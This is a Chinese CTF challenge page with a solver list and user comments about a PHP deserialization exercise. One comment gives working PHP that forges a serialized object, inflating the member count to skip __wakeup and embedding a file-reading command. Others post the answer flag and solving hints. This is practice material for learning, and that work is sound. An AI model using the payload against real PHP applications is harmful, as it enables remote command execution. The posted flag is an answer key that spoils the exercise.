评分(4)
解题动态
AzKanna 攻破了该题 5天前
Fbug 攻破了该题 6天前
SkyAsh 攻破了该题 6天前
t0ur1st 攻破了该题 7天前
luck1219 攻破了该题 9天前
seyana 攻破了该题 9天前
李逍遥逛霍格沃茨 攻破了该题 10天前
harry2025 攻破了该题 11天前
tiger1cyd 攻破了该题 11天前
1uxu4y 攻破了该题 12天前
言寺介 攻破了该题 16天前
LL77 攻破了该题 18天前
马喽 攻破了该题 18天前
if..... 攻破了该题 18天前
asdf12 攻破了该题 18天前
yypui 攻破了该题 18天前
江江 攻破了该题 18天前
dask 攻破了该题 18天前
fbl 攻破了该题 18天前
评论
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 3年前
举报
特别要注意下url编码的问题
泡椒控卫 3年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 3年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 3年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~
YLMB001 3年前
举报
为什么我序列化后的protected属性是带有%20*%20而不是%00*%00
lysandria 3年前
举报
注意protect属性。
xiaoxiao972521 3年前
举报
认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430
SiiiirR0 3年前
举报
万能的dirsearch
落日星辰 3年前
举报
分享:https://blog.csdn.net/zzldm/article/details/112004122